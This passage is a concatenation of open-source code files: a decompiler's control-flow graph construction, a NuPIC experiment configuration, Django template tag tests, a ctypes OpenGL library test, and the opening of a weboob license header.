for i in range(2, n + 1):
w = vertex[i]
dw = dom[w]
if dw != vertex[semi[w]]:
dom[w] = dom[dw]
dom[graph.entry] = None
return dom
def bfs(start):
to_visit = [start]
visited = set([start])
while to_visit:
node = to_visit.pop(0)
yield node
if node.exception_analysis:
for _, _, exception in node.exception_analysis.exceptions:
if exception not in visited:
to_visit.append(exception)
visited.add(exception)
for _, _, child in node.childs:
if child not in visited:
to_visit.append(child)
visited.add(child)
class GenInvokeRetName(object):
def __init__(self):
self.num = 0
self.ret = None
def new(self):
self.num += 1
self.ret = Variable('tmp%d' % self.num)
return self.ret
def set_to(self, ret):
self.ret = ret
def last(self):
return self.ret
def make_node(graph, block, block_to_node, vmap, gen_ret):
node = block_to_node.get(block)
if node is None:
node = build_node_from_block(block, vmap, gen_ret)
block_to_node[block] = node
if block.exception_analysis:
for _type, _, exception_target in block.exception_analysis.exceptions:
exception_node = block_to_node.get(exception_target)
if exception_node is None:
exception_node = build_node_from_block(exception_target,
vmap, gen_ret, _type)
exception_node.in_catch = True
block_to_node[exception_target] = exception_node
graph.add_catch_edge(node, exception_node)
for _, _, child_block in block.childs:
child_node = block_to_node.get(child_block)
if child_node is None:
child_node = build_node_from_block(child_block, vmap, gen_ret)
block_to_node[child_block] = child_node
graph.add_edge(node, child_node)
if node.type.is_switch:
node.add_case(child_node)
if node.type.is_cond:
if_target = ((block.end / 2) - (block.last_length / 2) +
node.off_last_ins)
child_addr = child_block.start / 2
if if_target == child_addr:
node.true = child_node
else:
node.false = child_node
# Check that both branch of the if point to something
# It may happen that both branch point to the same node, in this case
# the false branch will be None. So we set it to the right node.
# TODO: In this situation, we should transform the condition node into
# a statement node
if node.type.is_cond and node.false is None:
node.false = node.true
return node
def construct(start_block, vmap, exceptions):
bfs_blocks = bfs(start_block)
graph = Graph()
gen_ret = GenInvokeRetName()
# Construction of a mapping of basic blocks into Nodes
block_to_node = {}
exceptions_start_block = []
for exception in exceptions:
for _, _, block in exception.exceptions:
exceptions_start_block.append(block)
for block in bfs_blocks:
node = make_node(graph, block, block_to_node, vmap, gen_ret)
graph.add_node(node)
graph.entry = block_to_node[start_block]
del block_to_node, bfs_blocks
graph.compute_rpo()
graph.number_ins()
for node in graph.rpo:
preds = [pred for pred in graph.all_preds(node)
if pred.num < node.num]
if preds and all(pred.in_catch for pred in preds):
node.in_catch = True
# Create a list of Node which are 'return' node
# There should be one and only one node of this type
# If this is not the case, try to continue anyway by setting the exit node
# to the one which has the greatest RPO number (not necessarily the case)
lexit_nodes = [node for node in graph if node.type.is_return]
if len(lexit_nodes) > 1:
# Not sure that this case is possible...
logger.error('Multiple exit nodes found !')
graph.exit = graph.rpo[-1]
elif len(lexit_nodes) < 1:
# A method can have no return if it has throw statement(s) or if its
# body is a while(1) whitout break/return.
logger.debug('No exit node found !')
else:
graph.exit = lexit_nodes[0]
return graph
| apache-2.0 |
sambitgaan/nupic | tests/swarming/nupic/swarming/experiments/oneField/description.py | 32 | 14387 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by the OPF Experiment Generator to generate the actual
description.py file by replacing $XXXXXXXX tokens with desired values.
This description.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/ExpGenerator.py'
"""
from nupic.frameworks.opf.expdescriptionapi import ExperimentDescriptionAPI
from nupic.frameworks.opf.expdescriptionhelpers import (
updateConfigFromSubConfig,
applyValueGettersToContainer,
DeferredDictLookup)
from nupic.frameworks.opf.clamodelcallbacks import *
from nupic.frameworks.opf.metrics import MetricSpec
from nupic.frameworks.opf.opfutils import (InferenceType,
InferenceElement)
from nupic.support import aggregationDivide
from nupic.frameworks.opf.opftaskdriver import (
IterationPhaseSpecLearnOnly,
IterationPhaseSpecInferOnly,
IterationPhaseSpecLearnAndInfer)
# Model Configuration Dictionary:
#
# Define the model parameters and adjust for any modifications if imported
# from a sub-experiment.
#
# These fields might be modified by a sub-experiment; this dict is passed
# between the sub-experiment and base experiment
#
#
# NOTE: Use of DEFERRED VALUE-GETTERs: dictionary fields and list elements
# within the config dictionary may be assigned futures derived from the
# ValueGetterBase class, such as DeferredDictLookup.
# This facility is particularly handy for enabling substitution of values in
# the config dictionary from other values in the config dictionary, which is
# needed by permutation.py-based experiments. These values will be resolved
# during the call to applyValueGettersToContainer(),
# which we call after the base experiment's config dictionary is updated from
# the sub-experiment. See ValueGetterBase and
# DeferredDictLookup for more details about value-getters.
#
# For each custom encoder parameter to be exposed to the sub-experiment/
# permutation overrides, define a variable in this section, using key names
# beginning with a single underscore character to avoid collisions with
# pre-defined keys (e.g., _dsEncoderFieldName2_N).
#
# Example:
# config = dict(
# _dsEncoderFieldName2_N = 70,
# _dsEncoderFieldName2_W = 5,
# dsEncoderSchema = [
# base=dict(
# fieldname='Name2', type='ScalarEncoder',
# name='Name2', minval=0, maxval=270, clipInput=True,
# n=DeferredDictLookup('_dsEncoderFieldName2_N'),
# w=DeferredDictLookup('_dsEncoderFieldName2_W')),
# ],
# )
# updateConfigFromSubConfig(config)
# applyValueGettersToContainer(config)
config = {
# Type of model that the rest of these parameters apply to.
'model': "CLA",
# Version that specifies the format of the config.
'version': 1,
# Intermediate variables used to compute fields in modelParams and also
# referenced from the control section.
'aggregationInfo': { 'days': 0,
'fields': [ (u'timestamp', 'first'),
(u'gym', 'first'),
(u'consumption', 'mean'),
(u'address', 'first')],
'hours': 0,
'microseconds': 0,
'milliseconds': 0,
'minutes': 0,
'months': 0,
'seconds': 0,
'weeks': 0,
'years': 0},
'predictAheadTime': None,
# Model parameter dictionary.
'modelParams': {
# The type of inference that this model will perform
'inferenceType': 'TemporalNextStep',
'sensorParams': {
# Sensor diagnostic output verbosity control;
# if > 0: sensor region will print out on screen what it's sensing
# at each step 0: silent; >=1: some info; >=2: more info;
# >=3: even more info (see compute() in py/regions/RecordSensor.py)
'verbosity' : 0,
# Example:
# dsEncoderSchema = [
# DeferredDictLookup('__field_name_encoder'),
# ],
#
# (value generated from DS_ENCODER_SCHEMA)
'encoders': {
'consumption': { 'clipInput': True,
'fieldname': u'consumption',
'maxval': 200,
'minval': 0,
'n': 1500,
'name': u'consumption',
'type': 'ScalarEncoder',
'w': 21
},
},
# A dictionary specifying the period for automatically-generated
# resets from a RecordSensor;
#
# None = disable automatically-generated resets (also disabled if
# all of the specified values evaluate to 0).
# Valid keys is the desired combination of the following:
# days, hours, minutes, seconds, milliseconds, microseconds, weeks
#
# Example for 1.5 days: sensorAutoReset = dict(days=1,hours=12),
#
# (value generated from SENSOR_AUTO_RESET)
'sensorAutoReset' : None,
},
'spEnable': True,
'spParams': {
# SP diagnostic output verbosity control;
# 0: silent; >=1: some info; >=2: more info;
'spVerbosity' : 0,
'globalInhibition': 1,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
'inputWidth': 0,
# SP inhibition control (absolute value);
# Maximum number of active columns in the SP region's output (when
# there are more, the weaker ones are suppressed)
'numActiveColumnsPerInhArea': 40,
'seed': 1956,
# potentialPct
# What percent of the columns's receptive field is available
# for potential synapses. At initialization time, we will
# choose potentialPct * (2*potentialRadius+1)^2
'potentialPct': 0.5,
# The default connected threshold. Any synapse whose
# permanence value is above the connected threshold is
# a "connected synapse", meaning it can contribute to the
# cell's firing. Typical value is 0.10. Cells whose activity
# level before inhibition falls below minDutyCycleBeforeInh
# will have their own internal synPermConnectedCell
# threshold set below this default value.
# (This concept applies to both SP and TP and so 'cells'
# is correct here as opposed to 'columns')
'synPermConnected': 0.1,
'synPermActiveInc': 0.1,
'synPermInactiveDec': 0.01,
},
# Controls whether TP is enabled or disabled;
# TP is necessary for making temporal predictions, such as predicting
# the next inputs. Without TP, the model is only capable of
# reconstructing missing sensor inputs (via SP).
'tpEnable' : True,
'tpParams': {
# TP diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
# (see verbosity in nupic/trunk/py/nupic/research/TP.py and TP10X*.py)
'verbosity': 0,
# Number of cell columns in the cortical region (same number for
# SP and TP)
# (see also tpNCellsPerCol)
'columnCount': 2048,
# The number of cells (i.e., states), allocated per column.
'cellsPerColumn': 32,
'inputWidth': 2048,
'seed': 1960,
# Temporal Pooler implementation selector (see _getTPClass in
# CLARegion.py).
'temporalImp': 'cpp',
# New Synapse formation count
# NOTE: If None, use spNumActivePerInhArea
#
# TODO: need better explanation
'newSynapseCount': 15,
# Maximum number of synapses per segment
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSynapsesPerSegment': 32,
# Maximum number of segments per cell
# > 0 for fixed-size CLA
# -1 for non-fixed-size CLA
#
# TODO: for Ron: once the appropriate value is placed in TP
# constructor, see if we should eliminate this parameter from
# description.py.
'maxSegmentsPerCell': 128,
# Initial Permanence
# TODO: need better explanation
'initialPerm': 0.21,
# Permanence Increment
'permanenceInc': 0.1,
# Permanence Decrement
# If set to None, will automatically default to tpPermanenceInc
# value.
'permanenceDec' : 0.1,
'globalDecay': 0.0,
'maxAge': 0,
# Minimum number of active synapses for a segment to be considered
# during search for the best-matching segments.
# None=use default
# Replaces: tpMinThreshold
'minThreshold': 12,
# Segment activation threshold.
# A segment is active if it has >= tpSegmentActivationThreshold
# connected synapses that are active due to infActiveState
# None=use default
# Replaces: tpActivationThreshold
'activationThreshold': 16,
'outputType': 'normal',
# "Pay Attention Mode" length. This tells the TP how many new
# elements to append to the end of a learned sequence at a time.
# Smaller values are better for datasets with short sequences,
# higher values are better for datasets with long sequences.
'pamLength': 1,
},
'clParams': {
'regionName' : 'CLAClassifierRegion',
# Classifier diagnostic output verbosity control;
# 0: silent; [1..6]: increasing levels of verbosity
'clVerbosity' : 0,
# This controls how fast the classifier learns/forgets. Higher values
# make it adapt faster and forget older patterns faster.
'alpha': 0.001,
# This is set after the call to updateConfigFromSubConfig and is
# computed from the aggregationInfo and predictAheadTime.
'steps': '1',
},
'trainSPNetOnlyIfRequested': False,
},
}
# end of config dictionary
# Adjust base config dictionary for any modifications if imported from a
# sub-experiment
updateConfigFromSubConfig(config)
# Compute predictionSteps based on the predictAheadTime and the aggregation
# period, which may be permuted over.
if config['predictAheadTime'] is not None:
predictionSteps = int(round(aggregationDivide(
config['predictAheadTime'], config['aggregationInfo'])))
assert (predictionSteps >= 1)
config['modelParams']['clParams']['steps'] = str(predictionSteps)
# Adjust config by applying ValueGetterBase-derived
# futures. NOTE: this MUST be called after updateConfigFromSubConfig() in order
# to support value-getter-based substitutions from the sub-experiment (if any)
applyValueGettersToContainer(config)
control = {
# The environment that the current model is being run in
"environment": 'nupic',
# Input stream specification per py/nupicengine/cluster/database/StreamDef.json.
#
'dataset' : { u'info': u'test_NoProviders',
u'streams': [ { u'columns': [u'*'],
u'info': u'test data',
u'source': u'file://swarming/test_data.csv'}],
u'version': 1},
# Iteration count: maximum number of iterations. Each iteration corresponds
# to one record from the (possibly aggregated) dataset. The task is
# terminated when either number of iterations reaches iterationCount or
# all records in the (possibly aggregated) database have been processed,
# whichever occurs first.
#
# iterationCount of -1 = iterate over the entire dataset
#'iterationCount' : ITERATION_COUNT,
# Metrics: A list of MetricSpecs that instantiate the metrics that are
# computed for this experiment
'metrics':[
MetricSpec(field=u'consumption',
inferenceElement=InferenceElement.prediction,
metric='rmse'),
],
# Logged Metrics: A sequence of regular expressions that specify which of
# the metrics from the Inference Specifications section MUST be logged for
# every prediction. The regex's correspond to the automatically generated
# metric labels. This is similar to the way the optimization metric is
# specified in permutations.py.
'loggedMetrics': ['.*nupicScore.*'],
}
descriptionInterface = ExperimentDescriptionAPI(modelConfig=config,
control=control)
| agpl-3.0 |
ABaldwinHunter/django-clone-classic | tests/template_tests/test_custom.py | 116 | 19622 | from __future__ import unicode_literals
import os
from unittest import skipUnless
from django.template import Context, Engine, TemplateSyntaxError
from django.template.base import Node
from django.template.library import InvalidTemplateLibrary
from django.test import SimpleTestCase
from django.test.utils import extend_sys_path
from django.utils import six
from .templatetags import custom, inclusion
from .utils import ROOT
LIBRARIES = {
'custom': 'template_tests.templatetags.custom',
'inclusion': 'template_tests.templatetags.inclusion',
}
class CustomFilterTests(SimpleTestCase):
def test_filter(self):
engine = Engine(libraries=LIBRARIES)
t = engine.from_string("{% load custom %}{{ string|trim:5 }}")
self.assertEqual(
t.render(Context({"string": "abcdefghijklmnopqrstuvwxyz"})),
"abcde"
)
class TagTestCase(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.engine = Engine(app_dirs=True, libraries=LIBRARIES)
super(TagTestCase, cls).setUpClass()
def verify_tag(self, tag, name):
self.assertEqual(tag.__name__, name)
self.assertEqual(tag.__doc__, 'Expected %s __doc__' % name)
self.assertEqual(tag.__dict__['anything'], 'Expected %s __dict__' % name)
class SimpleTagTests(TagTestCase):
def test_simple_tags(self):
c = Context({'value': 42})
templates = [
('{% load custom %}{% no_params %}', 'no_params - Expected result'),
('{% load custom %}{% one_param 37 %}', 'one_param - Expected result: 37'),
('{% load custom %}{% explicit_no_context 37 %}', 'explicit_no_context - Expected result: 37'),
('{% load custom %}{% no_params_with_context %}',
'no_params_with_context - Expected result (context value: 42)'),
('{% load custom %}{% params_and_context 37 %}',
'params_and_context - Expected result (context value: 42): 37'),
('{% load custom %}{% simple_two_params 37 42 %}', 'simple_two_params - Expected result: 37, 42'),
('{% load custom %}{% simple_one_default 37 %}', 'simple_one_default - Expected result: 37, hi'),
('{% load custom %}{% simple_one_default 37 two="hello" %}',
'simple_one_default - Expected result: 37, hello'),
('{% load custom %}{% simple_one_default one=99 two="hello" %}',
'simple_one_default - Expected result: 99, hello'),
('{% load custom %}{% simple_one_default 37 42 %}',
'simple_one_default - Expected result: 37, 42'),
('{% load custom %}{% simple_unlimited_args 37 %}', 'simple_unlimited_args - Expected result: 37, hi'),
('{% load custom %}{% simple_unlimited_args 37 42 56 89 %}',
'simple_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_only_unlimited_args %}', 'simple_only_unlimited_args - Expected result: '),
('{% load custom %}{% simple_only_unlimited_args 37 42 56 89 %}',
'simple_only_unlimited_args - Expected result: 37, 42, 56, 89'),
('{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'simple_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
for entry in templates:
t = self.engine.from_string("%s as var %%}Result: {{ var }}" % entry[0][0:-2])
self.assertEqual(t.render(c), "Result: %s" % entry[1])
def test_simple_tag_errors(self):
errors = [
("'simple_one_default' received unexpected keyword argument 'three'",
'{% load custom %}{% simple_one_default 99 two="hello" three="foo" %}'),
("'simple_two_params' received too many positional arguments",
'{% load custom %}{% simple_two_params 37 42 56 %}'),
("'simple_one_default' received too many positional arguments",
'{% load custom %}{% simple_one_default 37 42 56 %}'),
("'simple_unlimited_args_kwargs' received some positional argument(s) after some keyword argument(s)",
'{% load custom %}{% simple_unlimited_args_kwargs 37 40|add:2 eggs="scrambled" 56 four=1|add:3 %}'),
("'simple_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load custom %}{% simple_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string("%s as var %%}" % entry[1][0:-2])
def test_simple_tag_escaping_autoescape_off(self):
c = Context({'name': "Jack & Jill"}, autoescape=False)
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_naive_escaping(self):
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_naive %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_explicit_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_explicit %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_format_html_escaping(self):
# Check we don't double escape
c = Context({'name': "Jack & Jill"})
t = self.engine.from_string("{% load custom %}{% escape_format_html %}")
self.assertEqual(t.render(c), "Hello Jack & Jill!")
def test_simple_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.no_params, 'no_params')
self.verify_tag(custom.one_param, 'one_param')
self.verify_tag(custom.explicit_no_context, 'explicit_no_context')
self.verify_tag(custom.no_params_with_context, 'no_params_with_context')
self.verify_tag(custom.params_and_context, 'params_and_context')
self.verify_tag(custom.simple_unlimited_args_kwargs, 'simple_unlimited_args_kwargs')
self.verify_tag(custom.simple_tag_without_context_parameter, 'simple_tag_without_context_parameter')
def test_simple_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'simple_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% simple_tag_without_context_parameter 123 %}')
class InclusionTagTests(TagTestCase):
def test_inclusion_tags(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params %}', 'inclusion_no_params - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param 37 %}', 'inclusion_one_param - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context 37 %}',
'inclusion_explicit_no_context - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context %}',
'inclusion_no_params_with_context - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context 37 %}',
'inclusion_params_and_context - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params 37 42 %}',
'inclusion_two_params - Expected result: 37, 42\n'),
(
'{% load inclusion %}{% inclusion_one_default 37 %}',
'inclusion_one_default - Expected result: 37, hi\n'
),
('{% load inclusion %}{% inclusion_one_default 37 two="hello" %}',
'inclusion_one_default - Expected result: 37, hello\n'),
('{% load inclusion %}{% inclusion_one_default one=99 two="hello" %}',
'inclusion_one_default - Expected result: 99, hello\n'),
('{% load inclusion %}{% inclusion_one_default 37 42 %}',
'inclusion_one_default - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 %}',
'inclusion_unlimited_args - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args 37 42 56 89 %}',
'inclusion_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args %}',
'inclusion_only_unlimited_args - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args 37 42 56 89 %}',
'inclusion_only_unlimited_args - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 56 eggs="scrambled" four=1|add:3 %}',
'inclusion_unlimited_args_kwargs - Expected result: 37, 42, 56 / eggs=scrambled, four=4\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_errors(self):
errors = [
("'inclusion_one_default' received unexpected keyword argument 'three'",
'{% load inclusion %}{% inclusion_one_default 99 two="hello" three="foo" %}'),
("'inclusion_two_params' received too many positional arguments",
'{% load inclusion %}{% inclusion_two_params 37 42 56 %}'),
("'inclusion_one_default' received too many positional arguments",
'{% load inclusion %}{% inclusion_one_default 37 42 56 %}'),
("'inclusion_one_default' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_one_default %}'),
("'inclusion_unlimited_args' did not receive value(s) for the argument(s): 'one'",
'{% load inclusion %}{% inclusion_unlimited_args %}'),
(
"'inclusion_unlimited_args_kwargs' received some positional argument(s) "
"after some keyword argument(s)",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 40|add:2 eggs="boiled" 56 four=1|add:3 %}',
),
("'inclusion_unlimited_args_kwargs' received multiple values for keyword argument 'eggs'",
'{% load inclusion %}{% inclusion_unlimited_args_kwargs 37 eggs="scrambled" eggs="scrambled" %}'),
]
for entry in errors:
with self.assertRaisesMessage(TemplateSyntaxError, entry[0]):
self.engine.from_string(entry[1])
def test_include_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'inclusion_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load inclusion %}{% inclusion_tag_without_context_parameter 123 %}')
def test_inclusion_tags_from_template(self):
c = Context({'value': 42})
templates = [
('{% load inclusion %}{% inclusion_no_params_from_template %}',
'inclusion_no_params_from_template - Expected result\n'),
('{% load inclusion %}{% inclusion_one_param_from_template 37 %}',
'inclusion_one_param_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_explicit_no_context_from_template 37 %}',
'inclusion_explicit_no_context_from_template - Expected result: 37\n'),
('{% load inclusion %}{% inclusion_no_params_with_context_from_template %}',
'inclusion_no_params_with_context_from_template - Expected result (context value: 42)\n'),
('{% load inclusion %}{% inclusion_params_and_context_from_template 37 %}',
'inclusion_params_and_context_from_template - Expected result (context value: 42): 37\n'),
('{% load inclusion %}{% inclusion_two_params_from_template 37 42 %}',
'inclusion_two_params_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 %}',
'inclusion_one_default_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_one_default_from_template 37 42 %}',
'inclusion_one_default_from_template - Expected result: 37, 42\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, hi\n'),
('{% load inclusion %}{% inclusion_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template %}',
'inclusion_only_unlimited_args_from_template - Expected result: \n'),
('{% load inclusion %}{% inclusion_only_unlimited_args_from_template 37 42 56 89 %}',
'inclusion_only_unlimited_args_from_template - Expected result: 37, 42, 56, 89\n'),
]
for entry in templates:
t = self.engine.from_string(entry[0])
self.assertEqual(t.render(c), entry[1])
def test_inclusion_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(inclusion.inclusion_no_params, 'inclusion_no_params')
self.verify_tag(inclusion.inclusion_one_param, 'inclusion_one_param')
self.verify_tag(inclusion.inclusion_explicit_no_context, 'inclusion_explicit_no_context')
self.verify_tag(inclusion.inclusion_no_params_with_context, 'inclusion_no_params_with_context')
self.verify_tag(inclusion.inclusion_params_and_context, 'inclusion_params_and_context')
self.verify_tag(inclusion.inclusion_two_params, 'inclusion_two_params')
self.verify_tag(inclusion.inclusion_one_default, 'inclusion_one_default')
self.verify_tag(inclusion.inclusion_unlimited_args, 'inclusion_unlimited_args')
self.verify_tag(inclusion.inclusion_only_unlimited_args, 'inclusion_only_unlimited_args')
self.verify_tag(inclusion.inclusion_tag_without_context_parameter, 'inclusion_tag_without_context_parameter')
self.verify_tag(inclusion.inclusion_tag_use_l10n, 'inclusion_tag_use_l10n')
self.verify_tag(inclusion.inclusion_unlimited_args_kwargs, 'inclusion_unlimited_args_kwargs')
def test_15070_use_l10n(self):
"""
Test that inclusion tag passes down `use_l10n` of context to the
Context of the included/rendered template as well.
"""
c = Context({})
t = self.engine.from_string('{% load inclusion %}{% inclusion_tag_use_l10n %}')
self.assertEqual(t.render(c).strip(), 'None')
c.use_l10n = True
self.assertEqual(t.render(c).strip(), 'True')
def test_no_render_side_effect(self):
"""
#23441 -- InclusionNode shouldn't modify its nodelist at render time.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_no_params %}')
count = template.nodelist.get_nodes_by_type(Node)
template.render(Context({}))
self.assertEqual(template.nodelist.get_nodes_by_type(Node), count)
def test_render_context_is_cleared(self):
"""
#24555 -- InclusionNode should push and pop the render_context stack
when rendering. Otherwise, leftover values such as blocks from
extending can interfere with subsequent rendering.
"""
engine = Engine(app_dirs=True, libraries=LIBRARIES)
template = engine.from_string('{% load inclusion %}{% inclusion_extends1 %}{% inclusion_extends2 %}')
self.assertEqual(template.render(Context({})).strip(), 'one\ntwo')
class AssignmentTagTests(TagTestCase):
def test_assignment_tags(self):
c = Context({'value': 42})
t = self.engine.from_string('{% load custom %}{% assignment_no_params as var %}The result is: {{ var }}')
self.assertEqual(t.render(c), 'The result is: assignment_no_params - Expected result')
def test_assignment_tag_registration(self):
# Test that the decorators preserve the decorated function's docstring, name and attributes.
self.verify_tag(custom.assignment_no_params, 'assignment_no_params')
def test_assignment_tag_missing_context(self):
# The 'context' parameter must be present when takes_context is True
msg = (
"'assignment_tag_without_context_parameter' is decorated with "
"takes_context=True so it must have a first argument of 'context'"
)
with self.assertRaisesMessage(TemplateSyntaxError, msg):
self.engine.from_string('{% load custom %}{% assignment_tag_without_context_parameter 123 as var %}')
class TemplateTagLoadingTests(SimpleTestCase):
@classmethod
def setUpClass(cls):
cls.egg_dir = os.path.join(ROOT, 'eggs')
super(TemplateTagLoadingTests, cls).setUpClass()
def test_load_error(self):
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'template_tests.broken_tag': cannot import name "
"'?Xtemplate'?"
)
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_tag': 'template_tests.broken_tag',
})
def test_load_error_egg(self):
egg_name = '%s/tagsegg.egg' % self.egg_dir
msg = (
"Invalid template library specified. ImportError raised when "
"trying to load 'tagsegg.templatetags.broken_egg': cannot "
"import name '?Xtemplate'?"
)
with extend_sys_path(egg_name):
with six.assertRaisesRegex(self, InvalidTemplateLibrary, msg):
Engine(libraries={
'broken_egg': 'tagsegg.templatetags.broken_egg',
})
def test_load_working_egg(self):
ttext = "{% load working_egg %}"
egg_name = '%s/tagsegg.egg' % self.egg_dir
with extend_sys_path(egg_name):
engine = Engine(libraries={
'working_egg': 'tagsegg.templatetags.working_egg',
})
engine.from_string(ttext)
@skipUnless(six.PY3, "Python 3 only -- Python 2 doesn't have annotations.")
def test_load_annotated_function(self):
Engine(libraries={
'annotated_tag_function': 'template_tests.annotated_tag_function',
})
| bsd-3-clause |
lokirius/python-for-android | python3-alpha/python3-src/Lib/ctypes/test/test_find.py | 65 | 2470 | import unittest
import sys
from ctypes import *
from ctypes.util import find_library
from ctypes.test import is_resource_enabled
if sys.platform == "win32":
lib_gl = find_library("OpenGL32")
lib_glu = find_library("Glu32")
lib_gle = None
elif sys.platform == "darwin":
lib_gl = lib_glu = find_library("OpenGL")
lib_gle = None
else:
lib_gl = find_library("GL")
lib_glu = find_library("GLU")
lib_gle = find_library("gle")
## print, for debugging
if is_resource_enabled("printing"):
if lib_gl or lib_glu or lib_gle:
print("OpenGL libraries:")
for item in (("GL", lib_gl),
("GLU", lib_glu),
("gle", lib_gle)):
print("\t", item)
# On some systems, loading the OpenGL libraries needs the RTLD_GLOBAL mode.
class Test_OpenGL_libs(unittest.TestCase):
def setUp(self):
self.gl = self.glu = self.gle = None
if lib_gl:
self.gl = CDLL(lib_gl, mode=RTLD_GLOBAL)
if lib_glu:
self.glu = CDLL(lib_glu, RTLD_GLOBAL)
if lib_gle:
try:
self.gle = CDLL(lib_gle)
except OSError:
pass
if lib_gl:
def test_gl(self):
if self.gl:
self.gl.glClearIndex
if lib_glu:
def test_glu(self):
if self.glu:
self.glu.gluBeginCurve
if lib_gle:
def test_gle(self):
if self.gle:
self.gle.gleGetJoinStyle
##if os.name == "posix" and sys.platform != "darwin":
## # On platforms where the default shared library suffix is '.so',
## # at least some libraries can be loaded as attributes of the cdll
## # object, since ctypes now tries loading the lib again
## # with '.so' appended of the first try fails.
## #
## # Won't work for libc, unfortunately. OTOH, it isn't
## # needed for libc since this is already mapped into the current
## # process (?)
## #
## # On MAC OSX, it won't work either, because dlopen() needs a full path,
## # and the default suffix is either none or '.dylib'.
## class LoadLibs(unittest.TestCase):
## def test_libm(self):
## import math
## libm = cdll.libm
## sqrt = libm.sqrt
## sqrt.argtypes = (c_double,)
## sqrt.restype = c_double
## self.assertEqual(sqrt(2), math.sqrt(2))
if __name__ == "__main__":
unittest.main()
| apache-2.0 |
yannrouillard/weboob | modules/prixcarburants/test.py | 5 | 1088 | # -*- coding: utf-8 -*-
# Copyright(C) 2012 Romain Bignon
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
